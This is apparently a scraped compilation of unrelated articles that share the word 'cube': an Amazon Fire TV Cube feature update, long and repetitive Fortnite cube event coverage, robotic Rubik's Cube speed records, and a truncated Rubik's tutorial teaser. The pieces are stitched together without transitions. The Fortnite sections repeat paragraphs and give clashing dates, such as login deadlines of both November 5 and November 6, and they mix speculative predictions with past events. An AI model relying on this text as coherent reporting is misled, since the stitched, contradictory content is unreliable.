Last week, Amazon updated Fire TV Cube with the Alexa Announcements feature (which lets you dictate a message that the other Echo devices in your home will broadcast) and notifications from your smart doorbell and camera. Now, Amazon’s giving the device even more parity with the Echo ecosystem by adding Follow-Up Mode and multiroom audio.
With Follow-Up Mode, you can ask Alexa for additional information or to carry out further actions after your initial request. So, when you say something like “Alexa, show me comedy movies” and it displays a selection of such films on your TV, you can ask it to play a certain flick without having to say “Alexa” again. You might also use Follow-Up Mode to ask for extra info about the weather or items on a list. You’ll need to switch on the feature from the settings in the Alexa app if you’d like to use it.
Multiroom audio is again fairly self-explanatory — ask Alexa to play a song, playlist or genre “everywhere” (including your home theater setup) or on certain groups of devices, and it will do just that. The feature supports Amazon Music, iHeartRadio, Pandora and other streaming services. There may be some lag compared with your other devices, but you should be able to rectify that through the TV Cube’s settings. An update that includes both features is rolling out today.

Players can now earn extra XP and a new piece of cosmetic gear as part of the finished Fornite Cube event.
The Fortnite Lil Kev Challenge are now available now and will provide players with a special Backbling item on completion.
Epic Games has confirmed that these new challenges are only available in the game for a limited amount of time.
So fans only have until November 11 to complete every task to unlock the new Lil Kev Backbling, complete with googly eyes.
Fans only need to login to have access to the new set of challenges but this has to happen before Monday, November 6, at 6PM GMT.
“Don’t miss out! Login anytime before 1PM ET (6PM UTC) Nov 5 to unlock the Lil’ Kev challenge pack,” a message from Epic Games confirms.
“Complete the challenges before 1 PM ET, November 11 (6PM UTC) to earn the Lil’ Kev Back Bling.”
The good news is that the Lil Kev Challenges are pretty straightforward and don’t require any scavenge hunt skills.
However, it might mean a lot of work for some players, due to the number of games required to play just to complete the first task.
Lil Kevin Challenges:
These new Lil Kev tasks stack with the current week 6 season 6 challenges currently available to complete in Fortnite.
As long-time fans will know, Epic Games releases seven Battle Royale challenges each week.
Three of the weekly challenges are available for free and the other four challenges are exclusive to Battle Pass users. The challenges are also separated into hard and regular tiers of difficulty.
The hard difficulty Fortnite challenges net players ten Battle Stars, while the regular tasks reward fans with five Battle Stars.
Earning Battle Stars levels up your Battle Pass, which is how you unlock all of the rewards on offer.
You can even unlock a secret Battle Star by completing all of the challenges and following the clue found within the hidden loading screen.

Fans have been given some very important news when it comes to the upcoming Fortnite cube event.
Following the big Halloween reveals, Fortnitemares Challenges and new skins, Epic Games are finishing off their current run with a bang.
The new Fortnite event will involve the cube doing something big, potentially changing the Fortnite map in major ways.
Lingering rumours of a volcano appearing on the map continue to gain traction, even though Epic Games have not revealed what they have planned.
The most recent event involving the Cube includes it cracking and dropping something into Leaky Lake.
Cracks have been slowly appearing all across it, suggesting a big explosion for the finale of it all.
There are also reports that it could last a long time, perhaps being five minutes in length according to some estimates.
This could also include three fragments of the Cube, although what they will do is hard to say.
WHAT TIME IS THE FORTNITE EVENT?
The ending of the Fortnite Cube Event is part of the completion of Fortnitemares, which has a scheduled end time.
We even know that a one-time in-game event is also being planned, so Fortnite fans know exactly when to tune in.
The Fortnite time is scheduled to begin today Sunday, November 4 at 1PM Eastern Time in the United States.
And for those in the UK, that means things kicking off in-game at around 6pm.
Other big news has also been shared with fans before things kick off and it’s information everyone will want to know.
Fortnite gamers hoping to watch the event will need to avoid trying to watch it via Playground Mode, as this will not be showing the events.
Here’s more from Epic Games, who clarified: “One of our Player Support Team members misspoke in this case.
“The ‘Playground LTM’ will not be a playlist where you could experience this in-game event. We’ve taken steps to make sure that this is clear in the lobby.
“See you Sunday.”
It should be noted that this Fortnite event will happen only once, meaning it won’t be repeated at any time in the future.
It will, of course, be broadcast by most Fortnite streamers on Twitch and be recorded on every platform you use.
A listing on the PlayStation Events page said the upcoming Fortnite live event is called the Fortnitemares Finale and it will last for five minutes.
However, this could simply be a placeholder name – one for that matter which doesn’t reveal much about what will take place.
Thankfully, those wondering what will happen during the Fortnite event have been treated to a major leak.
The Fortnite Battle Royale Leaks Twitter account uncovered in-game files which all seem to relate to the Fortnite event.
These files are for a series of sound effects and have all been labelled with ‘Butterfly’.
File names include mysterious titles such as Butterfly_BuildUp, Butterfly_Transition, Butterfly_Death_Sky and Butterfly_Sequence.
Gamers are reporting that the latest Fortnite event has occurred and could mean big things for the Floating Island.
According to those who have been keeping track of Kevin – currently stuck in the floating island – the cube could be returning to what used to be Loot Lake.
The island has been floating around the map for some time and now looks to have completed its task.
Having activated the runes originally left by the cube, it looks like the final ritual has been completed and all the runes have been dropped.
This week has featured the runes heading toward the island, which have now been headed back to the ground.
What this means is anyone’s guess, although fans are still hoping for some kind of big volcanic explosion, possibly as part of a new Halloween 2018 event.
This was hinted near the end of season 5 and was something Fortnite players thought would involve the cube.
There’s also the fact that the island now looks to be consuming everything on its surface, including the house.
Whatever Epic Games does have in mind for the cube and the island, we could be finding out very soon.
The development team have just started teasing Fortnitemares, which sounds like it’s being expanded for Halloween in 2018.
Epic Games posted a new picture of what looks to be a zombie calamity mash-up, along with the caption: “Costumes and dancing, Partner up, be wise. They could be friendly, Or a ghoul in disguise.”
Could this be a new LTM mode, much like we saw with the High Stakes event? It seems like that might be something Epic Games is hinting at.
And as fans found out with High Stakes, there could be new challenges and gear released too.
More teases could be released later this week as Epic Games starts gearing up for Halloween season.
Fortnite recently saw a new update released that changes the way games begin.
In order to make the action even more fast, frantic and chaotic, the Battle Bus has been given an update in the engine department.
Epic Games announced the news on Twitter, revealing that the Battle Bus would now travel at greater speeds.
“The Battle Bus is test driving an engine upgrade and now travels 25% faster while flying,” reads an Epic tweet. “Remember, always buckle up and thank your driver!”
Fans are still trying to work out what the Fortnite Cube and where it might be heading to.
And today it caused some major disruption during Epic Games’ Summer Skirmish event at PAX West.
A series of solo matches made up week 8 of Summer Skirmish action today, with several heats determining who made it into the final round.
Players could score points by scoring a victory royale, finishing in the top ten, or by tallying up over 3 eliminations.
But something the competitors weren’t prepared for was the Fortnite cube.
The mysterious purple object has been making its way across the map, burning runes into the ground while also creating low gravity zones.
During the fourth match of the Summer Skirmish, players found themselves heading toward the cube, due to the storm circle.
The Fortnite cube affected the circle of gameplay, sending players into the sky while they battled it out.
And following the cube’s influence on match four, the Fortnite casters confirmed that the gravitational effects would be turned off for the remaining games.
A seventh match was also added to the Summer Skirmish final, although it’s unclear if this was in connection with the cube’s pull.
It’s still unclear where the cube’s final destination will be or how long it will take to get there.
It was first thought that it could be heading toward Loot Lake; however, it now appears to be heading toward Greasy Grove.
But having taken so many detours, there’s no telling where it might end up next.
At the time of writing the Fortnite cube is on the Battle Royale map near Greasy Grove with fans left wondering where it is moving to next.
So far the Fortnite cube has been moving like clockwork, with it taking a step every one hour and 43 minutes.
It took five days since the Fortnite cube first appeared for it to take a step and then leave behind its first rune.
If the Fortnite cube continues moving at the same speed and leaving behind a rune at the same rate, then calculations may show when it will activate.
That hypothesis would show the Fortnite cube would take a step and leave behind its seventh and final rune on Friday, September 28.
However, it remains to be seen if the Fortnite cube immediately ‘turns on’ after leaving behind that rune.
It seems like whatever the cube does next, it will likely be part of some new live in-game event.
Just like how the rocket launch could be seen blowing up on live servers during season 4, it’s expected something big will happen with the cube in season 5.
There’s still no telling where it will go and what it will do when it gets there, although you can imagine it will be visible over much of the map.
Fortnite cube is the event that has that has sparked plenty of mystery in Battle Royale.
The Fortnite cube appeared on the Battle Royale map on Friday August 24 in the spot that lightning had been hitting in Paradise Palms.
Since then the mysterious purple cube has been on the move in Fortnite with the cube moving every one hour and 43 minutes.
The Fortnite cube is taking its time reaching its mysterious destination, with the cube only taking one step at each movement interval.
It’s been rumoured that the Fortnite cube could be heading to Loot Lake and once it activates it’s expected to signal some big map changes.
Fortnite Battle Royale players, however, are none the wiser as to when the Fortnite cube will finally stop moving and turn on.
However, pooling together a number of sources might given an indication as to when the Fortnite cube will turn on.
On Wednesday the Fortnite cube broke new ground and did something for the first time since appearing.

The Fortnite cube on that day after taking a step left a mysterious purple rune burned into the ground.
The Fortnite Battle Royale Leaks Twitter account said this will happen six more times before the Fortnite cube finally activates – possibly by a lake.
In a post online they revealed: “The cube left a rune burned into the ground as it moved!
“According to this picture it’ll move 6 more times and leave 6 more runes burned in the ground before reaching a lake and then activating”.

So far the Fortnite cube has been moving like clockwork, with it taking a step every one hour and 43 minutes.
It took five days since the Fortnite cube first appeared for it to leave behind its first rune.
If the Fortnite cube continues moving at the same speed, and leaving behind a rune at the same rate, then calculations may show when it will activate.
Using that hypothesis, it would mean the Fortnite cube would next leave a rune (its second out of seven) behind on Monday September 3.

And then the seventh and final rune would be left behind on Friday September 28.
This would be a full four weeks after the Fortnite cube first appeared.
It remains to be seen whether the Fortnite cube immediately activates after leaving behind the seventh and final rune.
Alternatively, after leaving behind that final rune it could move for another five days before at last activating.

If that is the case, then the Fortnite cube would activate at the latest on Wednesday October 3.
This is an important date for one big reason.
Throughout Fortnite season 5 there has been a countdown running showing how much time is left in the current Battle Pass.
At first the timer showed that Fortnite season 5 would end on Monday September 17, but this was later changed to Monday September 24.

However, it has now been rumoured that the Fortnite season 6 release date has been pushed back even further.
The Fortnite Battle Royale Leaks Twitter has claimed that the Fortnite season 5 end date could get delayed until Tuesday October 2.
With past Fortnite season crossovers the new Battle Pass has begun the day the previous one finished.
So, that means that Fortnite season 6 could launch on Wednesday October 3 – the same date estimates show the cube could activate on.

If this is the case then that would be the perfect way for Epic Games to build up anticipation for the brand new season of Fortnite.
The Fortnite cube is rumoured to activate by Loot Lake and bring with it huge map changes.
Before the cube went live the Fortnite Leakage Twitter account discovered proof of the mysterious event.

On Thursday August 23 they posted: “BIG EVENT! Some weird event called “Cube” will occur.
“There’s some REALLY weird sounds (which I’ll post soon) and some other stuff relating to “Crack Lightning”.
“It’s probably gonna move around the map like a rocket v2 of sorts. Oh yeah, and it’s also linked with new map changes!”
One upcoming rumoured map change is the addition of a new Crazy Castle point of interest which was allegedly leaked in a recent Fortnite promo.
The latest attempts at cracking the Fortnite Cube mystery continue this week.
It’s hard to miss the slow-moving purple object, which looks set to change things up during season 5.
Most fans will be thinking back to the launch of the rocket, and how that led to the significant events at the end of season 4.
This included a live in-game launch, which included the Fortnite rifts opening up for the first time.
And it appears the timing of the new Fortnite Cube correlates closely with big events in past seasons.
There’s a whole Reddit thread dedicated to tracking the purple cube, with a lot of players trying to work out where it might be heading.
Some believe that will include Loot Lake, although others are taking more novels ways to try and crack the mystery.
Some players have managed to get into the Fortnite Cube, which unfortunately didn’t provide many more clues.
The inside was pretty boring and didn’t include any new earth-shattering information.
It’s obvious that players aren’t supposed to be trying to glitch into it, at least not right now.
From what players have found out so far, the cube is moving at certain intervals each day.
This looks to be every 1hr and 43 minutes, although it’s likely that this will change frequently.
It has also been confirmed in Playground Mode that the cube destroys player builds when it does move.
There’s also the question of how the new Enforcer character fits into this, having been leaked as the new Road Trip skin earlier this month.
Could it be that the Enforcer has arrived to fix the mess the Visitor caused? Or is he just another character that’s going to make even more trouble across the island?
Some players are hoping that this fits into some of the Viking themes released by Epic Games, perhaps in connection with a Ragnarok-type event.
But like with past seasons, fans will likely have to wait and see just how the Fortnite Cube will interact with the map next.
And if indeed there is going to be another live in-game event, you can be sure that Epic Games will share some kind of clue so fans can be ready for it.
The Fortnite cube is covered in mysterious symbols, and if Battle Royale players stand near it, it charges up their shield.
But don’t try and touch it – if you do your Fortnite character will be sent flying into the air.
Elsewhere a new Fortnite map location could have been leaked which may tie into the Fortnite cube event.
The official Fortnite Twitter account recently teased the upcoming Capoeira emote.
But in the background of the video Fortnite players were able to make out what looks like a new location where the Villain Lair should be.
And while the location was far out, Fortnite players are convinced that they have spotted a castle in the emote promo video.
Adding further weight to this theory is a spray that has been spotted in the Battle Pass called ‘Crazy Castle’.
Readers of a certain age will, at some point in their lives, have become so frustrated trying to solve the classic 80s Rubik’s Cube puzzle that they’ve flung it against a wall. This video finally offers some payback.
If you too have experienced this rage, you’ll undoubtedly enjoy watching a robot try to solve one so fast that the distinctly-colored cube explodes. Finally, justice for enraged cube players everywhere.

The device, built by engineers Ben Katz and Jared Di Carlo specifically to smash the previous robo world record at completing the cube, did its job in another instance with incredible precision. Their machine solved the puzzle in a mind-boggling time of 0.38 seconds.
The dynamic duo’s device broke the previous record of 0.637 seconds set by Infineon Technologies AG’s Sub1 high performance robot back in November 2016. Comparatively, mere humans take a relative age to solve the cube. In October 2017, Korean wunderkind SeungBeom Cho set a new world record of an incredible 4.59 seconds.

Rubik’s Cube record.
Hardware hackers Ben Katz and Jared Di Carlo have smashed the previous record for solving the Rubik’s cube robotically. Their machine solved the puzzle in 0.38 seconds—a 40-percent improvement over the previous record of 0.637.
“We noticed that all of the fast Rubik’s Cube solvers were using stepper motors and thought that we could do better if we used better motors,” Di Carlo wrote in a blog post.
A custom-built motor controller allows a single turn of the Rubik’s Cube to be completed in around 10 milliseconds. With a a typical Rubik’s Cube solution taking 19 to 23 turns, that should allow a cube to be solved in around 0.25 seconds—but the pair say the current iteration of the machine makes a move every 15 milliseconds instead.

Since the weekend is coming up (or already here for some), we thought it’d be a great time to show how you can finally conquer the Rubiks Cube that’s collecting dust in your home. Best of all, it’ll only take 20 moves or less
